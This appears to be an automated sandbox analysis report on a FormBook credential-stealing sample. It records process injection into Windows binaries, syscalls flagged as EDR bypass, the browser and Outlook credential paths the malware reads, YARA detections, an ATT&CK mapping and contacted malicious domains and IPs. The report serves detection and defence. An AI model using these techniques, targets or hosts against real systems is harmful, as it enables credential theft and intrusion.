              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AC810 mov eax, dword ptr fs:[00000030h]10_2_227AC810
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C8F9 mov eax, dword ptr fs:[00000030h]10_2_2275C8F9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C8F9 mov eax, dword ptr fs:[00000030h]10_2_2275C8F9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EA8E4 mov eax, dword ptr fs:[00000030h]10_2_227EA8E4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E8C0 mov eax, dword ptr fs:[00000030h]10_2_2274E8C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F08C0 mov eax, dword ptr fs:[00000030h]10_2_227F08C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AC89D mov eax, dword ptr fs:[00000030h]10_2_227AC89D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720887 mov eax, dword ptr fs:[00000030h]10_2_22720887
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C4978 mov eax, dword ptr fs:[00000030h]10_2_227C4978
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C4978 mov eax, dword ptr fs:[00000030h]10_2_227C4978
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AC97C mov eax, dword ptr fs:[00000030h]10_2_227AC97C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22746962 mov eax, dword ptr fs:[00000030h]10_2_22746962
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22746962 mov eax, dword ptr fs:[00000030h]10_2_22746962
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22746962 mov eax, dword ptr fs:[00000030h]10_2_22746962
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2276096E mov eax, dword ptr fs:[00000030h]10_2_2276096E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2276096E mov edx, dword ptr fs:[00000030h]10_2_2276096E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2276096E mov eax, dword ptr fs:[00000030h]10_2_2276096E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A0946 mov eax, dword ptr fs:[00000030h]10_2_227A0946
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4940 mov eax, dword ptr fs:[00000030h]10_2_227F4940
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A892A mov eax, dword ptr fs:[00000030h]10_2_227A892A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B892B mov eax, dword ptr fs:[00000030h]10_2_227B892B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AC912 mov eax, dword ptr fs:[00000030h]10_2_227AC912
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22718918 mov eax, dword ptr fs:[00000030h]10_2_22718918
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22718918 mov eax, dword ptr fs:[00000030h]10_2_22718918
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E908 mov eax, dword ptr fs:[00000030h]10_2_2279E908
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279E908 mov eax, dword ptr fs:[00000030h]10_2_2279E908
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227529F9 mov eax, dword ptr fs:[00000030h]10_2_227529F9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227529F9 mov eax, dword ptr fs:[00000030h]10_2_227529F9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AE9E0 mov eax, dword ptr fs:[00000030h]10_2_227AE9E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h]10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h]10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h]10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h]10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h]10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272A9D0 mov eax, dword ptr fs:[00000030h]10_2_2272A9D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227549D0 mov eax, dword ptr fs:[00000030h]10_2_227549D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EA9D3 mov eax, dword ptr fs:[00000030h]10_2_227EA9D3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B69C0 mov eax, dword ptr fs:[00000030h]10_2_227B69C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A89B3 mov esi, dword ptr fs:[00000030h]10_2_227A89B3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A89B3 mov eax, dword ptr fs:[00000030h]10_2_227A89B3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A89B3 mov eax, dword ptr fs:[00000030h]10_2_227A89B3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227329A0 mov eax, dword ptr fs:[00000030h]10_2_227329A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227329A0 mov eax, dword ptr fs:[00000030h]10_2_227329A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227329A0 mov eax, dword ptr fs:[00000030h]10_2_227329A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227329A0 mov eax, dword ptr fs:[00000030h]10_2_227329A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227329A0 mov eax, dword ptr fs:[00000030h]10_2_227329A0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\z10982283782.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000 protect: page execute and read and writeJump to behavior
              Creates a thread in another existing process (thread injection)
              Source: C:\Users\user\Desktop\z10982283782.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 65F1560Jump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtClose: Direct from: 0x77762B6C
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\z10982283782.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000 value starts with: 4D5AJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Windows\SysWOW64\takeown.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\takeown.exeThread register set: target process: 1732Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\takeown.exeThread APC queued: target process: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\z10982283782.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 65F0000Jump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: ObMmiCfBgqmt.exe, 0000000C.00000002.2491251259.0000000001161000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000000.1446241653.0000000001160000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000000.1594251410.0000000000E80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: ObMmiCfBgqmt.exe, 0000000C.00000002.2491251259.0000000001161000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000000.1446241653.0000000001160000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000000.1594251410.0000000000E80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: ObMmiCfBgqmt.exe, 0000000C.00000002.2491251259.0000000001161000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000000.1446241653.0000000001160000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000000.1594251410.0000000000E80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
              Source: ObMmiCfBgqmt.exe, 0000000C.00000002.2491251259.0000000001161000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000C.00000000.1446241653.0000000001160000.00000002.00000001.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000000.1594251410.0000000000E80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02A95ACC
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: GetLocaleInfoA,0_2_02A9A7C4
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02A95BD8
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: GetLocaleInfoA,0_2_02A9A810
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A9920C GetLocalTime,0_2_02A9920C
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A9B78C GetVersionExA,0_2_02A9B78C

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\takeown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Valid Accounts              		1
              Native API              		1
              Valid Accounts              		1
              Valid Accounts              		1
              Valid Accounts              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Email Collection              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		1
              Access Token Manipulation              		1
              Access Token Manipulation              		LSASS Memory321
              Security Software Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)712
              Process Injection              		2
              Virtualization/Sandbox Evasion              		Security Account Manager2
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Abuse Elevation Control Mechanism              		712
              Process Injection              		NTDS3
              Process Discovery              		Distributed Component Object ModelInput Capture15
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Application Window Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Abuse Elevation Control Mechanism              		Cached Domain Credentials1
              System Network Connections Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
              Obfuscated Files or Information              		DCSync2
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem125
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539808 Sample: z10982283782.exe Startdate: 23/10/2024 Architecture: WINDOWS Score: 100 29 www.joshcharlesfitness.xyz 2->29 31 www.98080753.xyz 2->31 33 13 other IPs or domains 2->33 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 57 6 other signatures 2->57 10 z10982283782.exe 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 31->55 process4 dnsIp5 41 bitbucket.org 185.166.143.48, 443, 49699, 49700 AMAZON-02US Germany 10->41 43 s3-w.us-east-1.amazonaws.com 3.5.3.65, 443, 49701, 49704 AMAZON-AESUS United States 10->43 45 54.231.236.129, 443, 49713 AMAZON-02US United States 10->45 69 Writes to foreign memory regions 10->69 71 Allocates memory in foreign processes 10->71 73 Allocates many large memory junks 10->73 75 3 other signatures 10->75 14 colorcpl.exe 2 10->14         started        signatures6 process7 signatures8 77 Maps a DLL or memory area into another process 14->77 17 ObMmiCfBgqmt.exe 14->17 injected process9 signatures10 47 Found direct / indirect Syscall (likely to bypass EDR) 17->47 20 takeown.exe 13 17->20         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 20->59 61 Tries to harvest and steal browser information (history, passwords, etc) 20->61 63 Modifies the context of a thread in another process (thread injection) 20->63 65 3 other signatures 20->65 23 ObMmiCfBgqmt.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 35 www.facaicloud.top 74.48.31.123, 59633, 59644, 59650 TELUS-3CA Canada 23->35 37 www.98080753.xyz 161.97.168.245, 59652, 59653, 59654 CONTABODE United States 23->37 39 3 other IPs or domains 23->39 67 Found direct / indirect Syscall (likely to bypass EDR) 23->67 signatures15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              z10982283782.exe53%ReversingLabsWin32.Trojan.Remcos
              z10982283782.exe54%VirustotalBrowse
              z10982283782.exe100%AviraHEUR/AGEN.1326062

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
              bitbucket.org0%VirustotalBrowse
              www.facaicloud.top4%VirustotalBrowse
              wcp58.top0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s3-w.us-east-1.amazonaws.com
              		3.5.3.65
              		truefalseunknown
              bitbucket.org
              		185.166.143.48
              		truetrueunknown
              www.facaicloud.top
              		74.48.31.123
              		truetrueunknown
              wcp58.top
              		154.23.184.240
              		truetrueunknown
              www.cpamerix.online
              		194.58.112.174
              		truetrue
                		unknown
                www.g4s7e5.biz
                		203.90.227.88
                		truetrue
                  		unknown
                  www.98080753.xyz
                  		161.97.168.245
                  		truetrue
                    		unknown
                    joshcharlesfitness.xyz
                    		3.33.130.190
                    		truetrue
                      		unknown
                      lotus9.life
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.joshcharlesfitness.xyz
                        		unknown
                        		unknowntrue
                          		unknown
                          www.wcp58.top
                          		unknown
                          		unknowntrue
                            		unknown
                            bbuseruploads.s3.amazonaws.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.lotus9.life
                              		unknown
                              		unknowntrue
                                		unknown
                                171.39.242.20.in-addr.arpa
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

